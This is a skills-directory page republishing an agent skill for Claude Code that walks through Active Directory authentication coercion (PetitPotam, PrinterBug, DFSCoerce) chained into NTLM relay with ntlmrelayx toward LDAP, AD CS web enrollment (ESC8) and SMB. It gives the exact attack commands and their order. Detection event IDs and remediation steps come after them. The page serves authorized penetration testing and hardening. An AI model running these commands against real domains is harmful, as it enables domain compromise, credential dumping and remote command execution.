Agent skill

Coercion Ntlm Relay

by ADScanPro in ADScanPro/Claude-AD

Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.

MITAuto-check passedSecurity

Install Coercion Ntlm Relay

skills CLI
$ npx skills add ADScanPro/Claude-AD --skill coercion-ntlm-relay -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install ADScanPro/Claude-AD coercion-ntlm-relay --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/ADScanPro/Claude-AD.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/coercion-ntlm-relay .claude/skills/coercion-ntlm-relay && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
coercion-ntlm-relay
GitHub stars
211
Token cost
~1.9k tokens
SKILL.md length
819 words
Files
1
Skills in repo
7
Repo updated
First seen
Licence
MIT

At a glance

Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.

  • Works in 4 steps: Confirm an unprotected relay target… → Start ntlmrelayx.py pointed at LDAP / AD… → Coerce the DC (or other privileged host)… → …
  • SMB signing is not enforced
  • SKILL.md covers Part 1: Coercion, Part 2: NTLM Relay (impacket…, Full chain (order of operations) and Detection (Event IDs), plus 2 more sections
  • Calls python3

What it does

Coercion Ntlm Relay is an agent skill from ADScanPro/Claude-AD. Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB. Use when SMB signing is not enforced or LDAP channel binding is missing, and you want to force a privileged machine account to authenticate to your relay and turn that into RBCD, a DCSync-capable ACL grant, or a certificate. Includes the exact Coercer/ntlmrelayx commands, requirements, detection, and remediation.

Its SKILL.md is about 1.9k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Penetration testing, Red teaming and adversary simulation and Authentication. The repository describes itself as: Active Directory pentest methodology for Claude Code: skills, agents and slash commands for internal AD red-team work (Kerberoasting, ADCS ESC1-17, DCSync, ACL abuse, NTLM relay… The licence is MIT.

When your agent uses it

  • SMB signing is not enforced
  • LDAP channel binding is missing
  • You want to force a privileged machine account to authenticate to your relay and turn that into RBCD
  • A DCSync-capable ACL grant

Example prompts

  • “/coercion-ntlm-relay”

Requirements

  • Python 3

Workflow steps

4 steps, taken from the first numbered list in SKILL.md.

  1. Confirm an unprotected relay target (--gen-relay-list, LDAP signing/CBT check).
  2. Start ntlmrelayx.py pointed at LDAP / AD CS / SMB.
  3. Coerce the DC (or other privileged host) to authenticate to your relay IP with Coercer/PetitPotam/PrinterBug/DFSCoerce.
  4. Consume the result: RBCD → S4U (Kerberos skill), ESC8 cert → PKINIT (AD CS skill), or SMB action.

What it can do on your machine

Read from SKILL.md and the folder at commit 73efec5. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • python3

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • thehacker.recipes

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Coercion Ntlm Relay loads about 1.9k tokens when it runs. Until then it costs about 129 tokens; SKILL.md has 819 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~129
When it runs · the whole SKILL.md, loaded when a task matches
~1.9k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from ADScanPro/Claude-AD at commit 73efec5, republished under its MIT licence (© ADScanPro). 819 words, ~1,933 tokens.

Download SKILL.mdSave it as .claude/skills/coercion-ntlm-relay/SKILL.md (or your agent's skills folder).
name
coercion-ntlm-relay
description
Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB. Use when SMB signing is not enforced or LDAP channel binding is missing, and you want to force a privileged machine account to authenticate to your relay and turn that into RBCD, a DCSync-capable ACL grant, or a certificate. Includes the exact Coercer/ntlmrelayx commands, requirements, detection, and remediation.

Coercion + NTLM Relay

Two techniques that combine into one of the most reliable domain-compromise chains: force a target (usually a Domain Controller's machine account) to authenticate to a host you control, then relay that authentication to a service that lacks the protection to reject it. No credential cracking involved; you are borrowing a live authentication.

The chain only works when a relay target is unprotected:

  • Relay to LDAP/LDAPS requires LDAP signing not enforced and channel binding (EPA) absent.
  • Relay to SMB requires SMB signing not enforced on the destination.
  • Relay to AD CS web enrollment (ESC8) requires the HTTP enrollment endpoint up without EPA.

Check signing posture first:

nxc smb 10.0.0.0/24 --gen-relay-list relay_targets.txt        # hosts without SMB signing
nxc ldap 10.0.0.10 -u user -p 'Password123' -M ldap-checker   # LDAP signing / channel binding state

Part 1: Coercion

You need a way to make a privileged account authenticate outbound to your IP. Three RPC-based coercion methods, each abusing a different protocol. All fire the target's machine account ($) authentication at you.

PetitPotam: MS-EFSR (Encrypting File System Remote)

MITRE ATT&CK: T1187 (Forced Authentication)

Abuses the EFSRPC interface (EfsRpcOpenFileRaw and related). Often works unauthenticated against unpatched DCs; authenticated on patched ones.

Coercer coerce -u user -p 'Password123' -d CORP.LOCAL \
  -l <YOUR_IP> -t 10.0.0.10 --filter-method-name EfsRpc

Classic standalone tool:

python3 PetitPotam.py -u user -p 'Password123' -d CORP.LOCAL <YOUR_IP> 10.0.0.10
PrinterBug: MS-RPRN (Print System Remote Protocol)

MITRE ATT&CK: T1187

Abuses RpcRemoteFindFirstPrinterChangeNotificationEx via the Spooler service. Works wherever the Print Spooler is running (still common on DCs).

Coercer coerce -u user -p 'Password123' -d CORP.LOCAL \
  -l <YOUR_IP> -t 10.0.0.10 --filter-protocol-name MS-RPRN

Standalone:

python3 dementor.py <YOUR_IP> 10.0.0.10 -u user -p 'Password123' -d CORP.LOCAL
DFSCoerce: MS-DFSNM (Distributed File System Namespace Management)

MITRE ATT&CK: T1187

Abuses NetrDfsAddStdRoot/NetrDfsRemoveStdRoot. Useful when EFSR and Spooler are patched/disabled, because DFSNM is harder to turn off on a DC.

Coercer coerce -u user -p 'Password123' -d CORP.LOCAL \
  -l <YOUR_IP> -t 10.0.0.10 --filter-protocol-name MS-DFSNM

Standalone:

python3 dfscoerce.py -u user -p 'Password123' -d CORP.LOCAL <YOUR_IP> 10.0.0.10

Coercer sweeps all methods at once if you drop the filters, which is handy to find whatever is not patched.


Part 2: NTLM Relay (impacket ntlmrelayx)

Stand up the relay before you coerce. The coerced authentication lands on ntlmrelayx, which forwards it to your chosen target.

Relay to LDAP: grant RBCD or DCSync-capable rights

MITRE ATT&CK: T1557.001 (Adversary-in-the-Middle: LLMNR/NBT-NS/relay) / T1187

Relaying a DC's machine account to LDAP lets you write directory objects as that machine. The --delegate-access flow configures RBCD so you can then S4U to the coerced host (Kerberos skill). Requires LDAP signing not enforced and channel binding absent.

ntlmrelayx.py -t ldaps://10.0.0.10 --delegate-access --no-dump --no-da -smb2support

After the relay writes RBCD, S4U (see Kerberos skill). A relayed DC can also be pushed to grant a controlled principal replication rights (the WriteDACL-on-domain-head path in the ACL skill), which then enables DCSync as a post-compromise step.

Relay to AD CS web enrollment: ESC8

MITRE ATT&CK: T1557.001 / T1187

Relay the coerced DC machine account to the CA's HTTP web-enrollment endpoint and enroll a certificate as that DC. Then PKINIT the cert to a TGT (AD CS skill). Requires the web-enrollment endpoint up without EPA.

ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support \
  --adcs --template DomainController

Coerce a DC (PetitPotam) into this relay, take the issued .pfx, then certipy auth -pfx ....

Relay to SMB: remote command / secrets

MITRE ATT&CK: T1557.001

Relay to a member server whose SMB signing is not enforced to dump SAM or run a command as the relayed account.

ntlmrelayx.py -tf relay_targets.txt -smb2support -c 'whoami'
ntlmrelayx.py -t smb://10.0.0.50 -smb2support --dump-sam

Full chain (order of operations)

  1. Confirm an unprotected relay target (--gen-relay-list, LDAP signing/CBT check).
  2. Start ntlmrelayx.py pointed at LDAP / AD CS / SMB.
  3. Coerce the DC (or other privileged host) to authenticate to your relay IP with Coercer/PetitPotam/PrinterBug/DFSCoerce.
  4. Consume the result: RBCD → S4U (Kerberos skill), ESC8 cert → PKINIT (AD CS skill), or SMB action.

Show full SKILL.md (300 more words)Show less

Detection (Event IDs)

  • 4624 (successful logon) with Logon Type 3 and NTLM authentication package, where the account is a machine account ($) authenticating to a host it has no business reaching (the relay endpoint). Machine-to-machine NTLM to a non-standard destination is the core signal.
  • 4662 on the domain object if the relay wrote replication rights; 5136 for the RBCD / DACL / owner writes the relayed session performs (see ACL skill).
  • 4886/4887 on the CA for the ESC8 certificate request/issuance.
  • 5145 (network share object checked) and Spooler/DFS RPC activity on the coerced host around the coercion call.
  • Defender for Identity raises alerts for suspected NTLM relay and for the coercion RPC patterns.

Remediation to write up

  • Enforce SMB signing (require, not just enable) on all hosts, DCs included. This alone breaks SMB relay.
  • Enforce LDAP signing and enable LDAP channel binding (EPA) on Domain Controllers. This breaks the LDAP relay path (Microsoft's hardening, e.g. the LDAP channel-binding/signing enforcement updates).
  • Enable EPA and require HTTPS on AD CS web enrollment; disable HTTP; disable web enrollment if unused. This closes ESC8.
  • Restrict/patch the coercion surface: apply the PetitPotam patch, disable the Print Spooler on DCs and servers that do not print, and apply DFSCoerce mitigations. Coercion methods are many, so relay-target hardening (signing/EPA) is the durable fix.
  • RestrictReceivingNTLMTraffic / RestrictSendingNTLMTraffic GPOs to constrain NTLM, and ultimately move toward disabling NTLM where feasible.
  • Put Tier-0 accounts in Protected Users so their NTLM cannot be relayed.
  • Alert on machine-account NTLM logons to unexpected hosts (4624 type 3 NTLM from $ accounts).

Only run coercion and relay against systems you are explicitly authorized to test. Coercion generates real authentication traffic and can disrupt services. Use lab/generic IPs, hostnames and CA names in write-ups.


Reference

© ADScanPro, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/coercion-ntlm-relay of ADScanPro/Claude-AD.

Open the folder on GitHubat commit 73efec5

Compare with similar skills

Coercion Ntlm Relay next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Coercion Ntlm Relay compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Coercion Ntlm Relay this skillADScanPro/Claude-AD211—~1.9kAutomated safety check: PassMIT
Building Identity Federation With Saml Azure Admukul975/Anthropic-Cybersecurity-Skills34k—~2.5kAutomated safety check: PassApache-2.0
Cybersecurityohmyjahh/xquads-squads277—~895Automated safety check: PassMIT
Detecting T1548 Abuse Elevation Control Mechanismmukul975/Anthropic-Cybersecurity-Skills34k—~1.5kAutomated safety check: NotesApache-2.0
Exploiting Vulnerabilities With Metasploit Frameworkmukul975/Anthropic-Cybersecurity-Skills34k—~1.9kAutomated safety check: NotesApache-2.0
Detecting Attacks On Historian Serversmukul975/Anthropic-Cybersecurity-Skills34k—~3kAutomated safety check: PassApache-2.0

Similar skills

  • Building Identity Federation With Saml Azure Ad

    mukul975/Anthropic-Cybersecurity-Skills

    Configure SAML 2.0 identity federation between on-premises Active Directory (via AD FS or a third-party IdP) and Microsoft Entra ID, covering federation models (AD FS, password hash sync…

    34k GitHub stars~2.5k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Cybersecurity

    ohmyjahh/xquads-squads

    Squad de 15 agentes de seguranca ofensiva e defensiva (Georgia Weidman, Peter Kim, Jim Manico, Chris Sanders, Omar Santos, Marcus Carey) cobrindo pentest, red team, blue team, AppSec, recon e…

    277 GitHub stars~895 tokensUpdated 11 days ago
    SecurityAuto-check passed
  • Detecting T1548 Abuse Elevation Control Mechanism

    mukul975/Anthropic-Cybersecurity-Skills

    Detect abuse of elevation control mechanisms (T1548), including Windows UAC bypass via auto-elevating binaries like fodhelper.exe and Linux sudo/setuid/setgid exploitation, by monitoring registry…

    34k GitHub stars~1.5k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Exploiting Vulnerabilities With Metasploit Framework

    mukul975/Anthropic-Cybersecurity-Skills

    Uses the Metasploit Framework (msfconsole and its exploit, auxiliary, and post-exploitation modules) to validate that identified CVEs and vulnerabilities are actually exploitable, gather…

    34k GitHub stars~1.9k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Detecting Attacks On Historian Servers

    mukul975/Anthropic-Cybersecurity-Skills

    Detect cyber attacks on OT historian servers (OSIsoft PI, Ignition, GE Proficy, Wonderware InSQL) using a Python detector that flags unauthorized queries, data manipulation, and lateral-movement…

    34k GitHub stars~3k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Implementing Network Access Control With Cisco Ise

    mukul975/Anthropic-Cybersecurity-Skills

    Deploys Cisco Identity Services Engine (ISE) as a RADIUS policy server for 802.1X wired and wireless authentication, MAC Authentication Bypass, posture assessment, dynamic VLAN assignment…

    34k GitHub stars~2.9k tokensUpdated 1 mo ago
    SecurityAuto-check passed

More from ADScanPro/Claude-AD

  • Acl Abuse

    ADScanPro/Claude-AD

    Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication…

    211 GitHub stars~2.6k tokensUpdated 1 mo ago
    Auto-check passed
  • Ad Environment Constraints

    ADScanPro/Claude-AD

    Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…

    211 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check: notes
  • Ad Opsec Telemetry

    ADScanPro/Claude-AD

    The telemetry each Active Directory technique generates and what alerts a defender: Kerberoasting produces Event 4769 with RC4 encryption (0x17) and an MDI alert, DCSync produces Event 4662 with the…

    211 GitHub stars~2.4k tokensUpdated 1 mo ago
    Auto-check passed
  • Adcs Attacks

    ADScanPro/Claude-AD

    Active Directory Certificate Services (AD CS) escalation techniques ESC1 through ESC17, driven by hand with Certipy (ly4k).

    211 GitHub stars~3.6k tokensUpdated 1 mo ago
    Auto-check passed
  • Kerberos Attacks

    ADScanPro/Claude-AD

    Kerberos-based Active Directory attacks driven by hand with standard tooling (Kerberoasting, AS-REP roasting, and delegation abuse: unconstrained, constrained/S4U, RBCD).

    211 GitHub stars~2.9k tokensUpdated 1 mo ago
    Auto-check: notes
  • Compliance Mapping

    ADScanPro/Claude-AD

    A high-level conceptual mapping from Active Directory attack techniques to the compliance controls they touch.

    211 GitHub stars~1.7k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Coercion Ntlm Relay

What does Coercion Ntlm Relay do?

Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB. Coercion Ntlm Relay is an agent skill from ADScanPro/Claude-AD. Authentication coercion (PetitPotam MS-EFSR, PrinterBug MS-RPRN, DFSCoerce MS-DFSNM) chained into NTLM relay (impacket ntlmrelayx) toward LDAP, AD CS web enrollment (ESC8), or SMB.

When should I use Coercion Ntlm Relay?

Coercion Ntlm Relay fits situations like: SMB signing is not enforced; LDAP channel binding is missing; you want to force a privileged machine account to authenticate to your relay and turn that into RBCD; A DCSync-capable ACL grant.

How do I install Coercion Ntlm Relay in Claude Code?

Run `npx skills add ADScanPro/Claude-AD --skill coercion-ntlm-relay -a claude-code`. Or copy the skill folder (skills/coercion-ntlm-relay in ADScanPro/Claude-AD) into .claude/skills/coercion-ntlm-relay in your project. Claude Code loads it when a task matches its description.

How do I install Coercion Ntlm Relay in Codex?

Run `npx skills add ADScanPro/Claude-AD --skill coercion-ntlm-relay -a codex`. Or copy the skill folder (skills/coercion-ntlm-relay in ADScanPro/Claude-AD) into .agents/skills/coercion-ntlm-relay in your project. Codex loads it when a task matches its description.

Can I use Coercion Ntlm Relay in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ADScanPro/Claude-AD --skill coercion-ntlm-relay -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/coercion-ntlm-relay, .gemini/skills/coercion-ntlm-relay, .github/skills/coercion-ntlm-relay and .opencode/skills/coercion-ntlm-relay in your project.

What does Coercion Ntlm Relay need to run?

Going by SKILL.md and its folder, Coercion Ntlm Relay needs the command-line tools its instructions call (python3). Our summary lists: Python 3.

Does Coercion Ntlm Relay access the network?

SKILL.md names 1 domain. As links in the text: thehacker.recipes. This is read from the text; nothing was executed.

Is Coercion Ntlm Relay safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Coercion Ntlm Relay use?

Coercion Ntlm Relay is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Coercion Ntlm Relay use?

About 1.9k tokens (SKILL.md is roughly 7.7k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Coercion Ntlm Relay?

Skills that share tags, products or a category with Coercion Ntlm Relay: Building Identity Federation With Saml Azure Ad (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Cybersecurity (ohmyjahh/xquads-squads, 277 stars), Detecting T1548 Abuse Elevation Control Mechanism (mukul975/Anthropic-Cybersecurity-Skills, 34k stars) and Exploiting Vulnerabilities With Metasploit Framework (mukul975/Anthropic-Cybersecurity-Skills, 34k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Coercion Ntlm Relay?

ADScanPro (a GitHub user) maintains it in ADScanPro/Claude-AD, which has 211 GitHub stars. The repository holds 7 skills in this directory. The repository was last updated on August 24, 2026.

Source: ADScanPro/Claude-AD on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.